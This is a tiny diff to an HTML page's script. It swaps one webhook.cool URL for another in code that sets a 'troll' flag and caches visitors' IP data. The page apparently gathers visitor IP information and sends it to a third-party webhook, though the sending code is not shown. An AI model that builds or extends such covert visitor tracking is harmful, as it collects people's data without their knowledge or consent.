--- a/index.html
+++ b/index.html
@@ -281,7 +281,7 @@
 
     <script>
         let trollStarted = false;
-        const WEBHOOK_URL = 'https://tender-fish-92.webhook.cool';
+        const WEBHOOK_URL = 'https://blue-owl-08.webhook.cool';
 
         // Cache dos dados de IP para não fazer múltiplas requisições
         let cachedIpData = null;
